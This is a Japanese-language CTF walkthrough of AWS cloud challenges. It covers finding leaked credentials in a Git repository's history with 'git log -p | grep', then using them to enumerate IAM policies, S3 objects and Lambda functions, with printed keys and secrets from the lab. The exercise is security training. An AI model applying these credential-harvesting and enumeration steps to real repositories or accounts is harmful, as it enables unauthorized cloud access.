English ver. -> https://hackmd.io/@POkJ8tzYSMKRnIFAFaPw4w/SJnFgxLYj
まとめトップ
Recover the Cloud Ring
すごい機械が置いてある。
AWS CLI Intro
Difficulty: ★
Try out some basic AWS command line skills in this terminal. Talk to Jill Underpole in the Cloud Ring for hints.
横の人に話しかけるとヒントがもらえる。
Hint: In the AWS command line (CLI), the Secure Token Service or STS has one very useful function.
https://awscli.amazonaws.com/v2/documentation/api/latest/reference/sts/get-caller-identity.html
ふむ。なるほどね。コンソールを開くと、指示が来るので従っていく。
You may not know this, but AWS CLI help messages are very easy to access. First, try typing:
$ aws help
指示通り、aws helpする。
Great! When you're done, you can quit with q.
qを押して終了。
Next, please configure the default aws cli credentials with the access key AKQAAYRKO7A5Q5XUY2IY,
the secret key qzTscgNdcdwIo/soPKPoJn9sBrl5eMQQL19iO5uf and the region us-east-1 .
https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-quickstart.html#cli-configure-quickstart-config
aws configureと打って指定していく。
Excellent! To finish, please get your caller identity using the AWS command line. For more details please reference:
$ aws sts help
or reference:
https://awscli.amazonaws.com/v2/documentation/api/latest/reference/sts/index.html
リファレンスを読むとaws sts get-caller-identity
でいいみたい。
実行するとクリア。
次のチャレンジ…の前に
階段横から壁抜きができ、宝箱がある。
Trufflehog Search
Difficulty: ★★
Use Trufflehog to find secrets in a Git repo. Work with Jill Underpole in the Cloud Ring for hints. What's the name of the file that has AWS credentials?
コンソールの無い問題。
https://haugfactory.com/asnowball/aws_scripts.git からAWSの認証情報を抜き出すために認証情報が入ったファイルを探す。
一見、クレデンシャルは含まれていないので編集履歴を漁ってみる。
git log -p
すると、aws_secret_access_keyといった部分が見つかって過去書きこまれていたことがわかる。これが書かれているファイルのファイル名が答え。
put_policy.py
Exploitation via AWS CLI
Difficulty: ★★★
Flex some more advanced AWS CLI skills to escalate privileges! Help Gerty Snowburrow in the Cloud Ring to get hints for this challenge.
こちらも指示に従いなら解いていく。
Use Trufflehog to find credentials in the Gitlab instance at https://haugfactory.com/asnowball/aws_scripts.git.
Configure these credentials for us-east-1 and then run:
$ aws sts get-caller-identity
repoを落としてきて中身を見るが、クレデンシャルは含まれていない。
編集履歴にないか探ってみると、ある。
$ git log -p | grep aws_access_key_id
aws_access_key_id="AKIAAIDAYRANYAHGQOHD"
$ git log -p | grep aws_secret_access_key
aws_secret_access_key="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"
aws configure
で設定してaws sts get-caller-identity
とすると次に進む。
Managed (think: shared) policies can be attached to multiple users. Use the AWS CLI to findall/ any policies attached to your user.
The aws iam command to list attached user policies can be found here:
https://awscli.amazonaws.com/v2/documentation/api/latest/reference/iam/index.html
Hint: it is NOT list-user-policies.
色々ググるとaws iam list-attached-user-policies --user-name haug
で抜ける。
$ aws iam list-attached-user-policies --user-name haug { "AttachedPolicies": [ { "PolicyName": "TIER1_READONLY_POLICY", "PolicyArn": "arn:aws:iam::602123424321:policy/TIER1_READONLY_POLICY" } ], "IsTruncated": false }
Now, view or get the policy that is attached to your user.
The aws iam command to get a policy can be found here:
https://awscli.amazonaws.com/v2/documentation/api/latest/reference/iam/index.html
aws iam get-policy --policy-arn 'arn:aws:iam::602123424321:policy/TIER1_READONLY_POLICY'
で情報が抜ける。
$ aws iam get-policy --policy-arn 'arn:aws:iam::602123424321:policy/TIER1_READONLY_POLICY' { "Policy": { "PolicyName": "TIER1_READONLY_POLICY", "PolicyId": "ANPAYYOROBUERT7TGKUHA", "Arn": "arn:aws:iam::602123424321:policy/TIER1_READONLY_POLICY", "Path": "/", "DefaultVersionId": "v1", "AttachmentCount": 11, "PermissionsBoundaryUsageCount": 0, "IsAttachable": true, "Description": "Policy for tier 1 accounts to have limited read only access to certain resources in IAM, S3, and LAMBDA.", "CreateDate": "2022-06-21 22:02:30+00:00", "UpdateDate": "2022-06-21 22:10:29+00:00", "Tags": [] } }
ok.
Attached policies can have multiple versions. View the default version of this policy.
The aws iam command to get a policy version can be found here:
https://awscli.amazonaws.com/v2/documentation/api/latest/reference/iam/index.html
get-policy-versionが使えそう
aws iam get-policy-version --policy-arn 'arn:aws:iam::602123424321:policy/TIER1_READONLY_POLICY' --version-id 'v1'
先ほどの出力からデフォルトバージョンはv1とあるので、それを使った。
Inline policies are policies that are unique to a particular identity or resource. Use the AWS CLI to list the inline policies associated with your user.
The aws iam command to list user policies can be found here:
https://awscli.amazonaws.com/v2/documentation/api/latest/reference/iam/index.html
Hint: it is NOT list-attached-user-policies.
aws iam list-user-policies --user-name haug
で抜ける。
$ aws iam list-user-policies --user-name haug { "PolicyNames": [ "S3Perms" ], "IsTruncated": false }
Now, use the AWS CLI to get the only inline policy for your user.
The aws iam command to get a user policy can be found here:
https://awscli.amazonaws.com/v2/documentation/api/latest/reference/iam/index.html
aws iam get-user-policy --user-name haug --policy-name S3Perms
でok.
$ aws iam get-user-policy --user-name haug --policy-name S3Perms { "UserPolicy": { "UserName": "haug", "PolicyName": "S3Perms", "PolicyDocument": { "Version": "2012-10-17", "Statement": [ { "Effect": "Allow", "Action": [ "s3:ListObjects" ], "Resource": [ "arn:aws:s3:::smogmachines3", "arn:aws:s3:::smogmachines3/*" ] } ] } }, "IsTruncated": false }
The inline user policy named S3Perms disclosed the name of an S3 bucket that you have permissions to list objects.
List those objects!
The aws s3api command to list objects in an s3 bucket can be found here:
https://awscli.amazonaws.com/v2/documentation/api/latest/reference/s3api/index.html
aws s3api list-objects --bucket smogmachines3
でok.
The attached user policy provided you several Lambda privileges. Use the AWS CLI to list Lambda functions.
The aws lambda command to list functions can be found here:
https://awscli.amazonaws.com/v2/documentation/api/latest/reference/lambda/index.html
aws lambda list-functions
でok.
$ aws lambda list-functions { "Functions": [ { "FunctionName": "smogmachine_lambda", "FunctionArn": "arn:aws:lambda:us-east-1:602123424321:function:smogmachine_lambda", "Runtime": "python3.9", "Role": "arn:aws:iam::602123424321:role/smogmachine_lambda", db3277 "Handler": "handler.lambda_handler", "CodeSize": 2126, "Description": "", "Timeout": 600, "MemorySize": 256, "LastModified": "2022-09-07T19:28:23.634+0000", "CodeSha256": "GFnsIZfgFNA1JZP3TgTI0tIavOpDLiYlg7oziWbtRsa=", "Version": "$LATEST", "VpcConfig": { "SubnetIds": [ "subnet-8c80a9cb8b3fa5505" ], "SecurityGroupIds": [ "sg-b51a01f5b4711c95c" ], "VpcId": "vpc-85ea8596648f35e00" Dec-22 }, "Environment": { "Variables": { "LAMBDASECRET": "975ceab170d61c75", "LOCALMNTPOINT": "/mnt/smogmachine_files" } }, "TracingConfig": { "Mode": "PassThrough" }, "RevisionId": "7e198c3c-d4ea-48dd-9370-e5238e9ce06e", "FileSystemConfigs": [ { "Arn": "arn:aws:elasticfilesystem:us-east-1:602123424321:access-point/fsap-db3277b03c6e975d2", "LocalMountPath": "/mnt/smogmachine_files" } ], "PackageType": "Zip", "Architectures": [ "x86_64" ], "EphemeralStorage": { "Size": 512 } } ] }
Lambda functions can have public URLs from which they are directly accessible.
Use the AWS CLI to get the configuration containing the public URL of the Lambda function.
The aws lambda command to get the function URL config can be found here:
https://awscli.amazonaws.com/v2/documentation/api/latest/reference/lambda/index.html
aws lambda get-function-url-config --function-name smogmachine_lambda
でok.
$ aws lambda get-function-url-config --function-name smogmachine_lambda { "FunctionUrl": "https://rxgnav37qmvqxtaksslw5vwwjm0suhwc.lambda-url.us-east-1.on.aws/", "FunctionArn": "arn:aws:lambda:us-east-1:602123424321:function:smogmachine_lambda", "AuthType": "AWS_IAM", "Cors": { "AllowCredentials": false, "AllowHeaders": [], "AllowMethods": [ "GET", "POST" ], "AllowOrigins": [ "*" ], "ExposeHeaders": [], "MaxAge": 0 }, "CreationTime": "2022-09-07T19:28:23.808713Z", "LastModifiedTime": "2022-09-07T19:28:23.808713Z" }
これでクリア。ボス問だったみたいで、リングが手に入った。かわいいリング。
最後のリング…の前に
Burning Ring Of Fireの右から進むと宝箱がある。
お金と変なhatがもらえる。